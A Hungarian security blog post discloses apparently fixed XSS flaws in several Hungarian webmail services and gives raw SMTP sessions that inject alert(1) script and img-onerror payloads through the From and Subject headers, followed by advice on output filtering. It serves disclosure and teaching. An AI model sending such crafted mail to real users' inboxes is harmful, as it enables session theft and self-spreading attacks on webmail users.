Kemény volt ez a hét, sajnos van mit van mit bepótolnom az elmúlt napokból. Elsőként darkelf felfedezéseit közölném, melyek igen jó táptalajt adtak volna egy országos XSS-féreg járvány kirobbanásához - szerencsére (elvileg) már javították őket.

A sebezhetőségek a nagy magyar webmail szolgáltatók krémét érintették, kihasználásukhoz mindössze egy telnet alkalmazásra, és az SMTP protokoll alapvető ismeretére volt szükség. 

Freemail:

HELO
MAIL FROM: <valaki@freemail.hu>
RCPT To: <cimzett@freemail.hu>
DATA
From: "Egy ismeros <script>alert(1)</script>" <valaki@freemail.hu>
To: <cimzett@freemail.hu>
Subject: szia

Szoveg

.
QUIT

Citromail:

HELO
MAIL FROM: <valaki@freemail.hu>
RCPT To: <cimzett@citromail.hu>
DATA
From: "Egy ismeros" <valaki@freemail.hu>
To: <cimzett@citromail.hu>
Subject: szia <img src="a" onError="alert(1);" />

Szoveg

.
QUIT

VIPmail/Indamail:

HELO
MAIL FROM: <valaki@freemail.hu>
RCPT To: <cimzett@indamail.hu>
DATA
From: "Egy ismeros" <valaki@freemail.hu"<img src='' onerror='alert(1)' height='0' width='0'>
To: <cimzett@indamail.hu>
Subject: szia

Szoveg

.
QUIT

 

Az elmúlt évek során a hasonló rendszerek - a helyi esetekből és a külföldi példákból tanulva - rengeteget fejlődtek. A fenti példákból azonban az olvasható ki, hogy a fejlesztők feltételezték, csak az vehető ki a dobozból, amit ők gondos szűrések után behelyeztek oda. A helyzet azonban - ahogyan azt a példa is alátámasztja - nem mindig ilyen egyszerű: lehet hogy a bemeneti csatornák száma túlzottan nagy ahhoz, hogy minden érkező adatot ellenőrizzünk (akár teljesítmény okokból), de lehet hogy egyszerűen nincs lehetőségünk beavatkozni a bejövő adatfolyamba. 

A kimenetek szűrése ilyenkor legtöbb esetben egy huszárvágással megoldja a problémát. Ha nem akarjuk, hogy a felhasználóink potenciálisan veszélyes adatokat lássanak, ne mutassunk nekik ilyet! Azonban vigyázzunk: mindez nem akadályozza meg, hogy a programunk az elvárttól eltérő működést produkáljon egy váratlan adat hatására!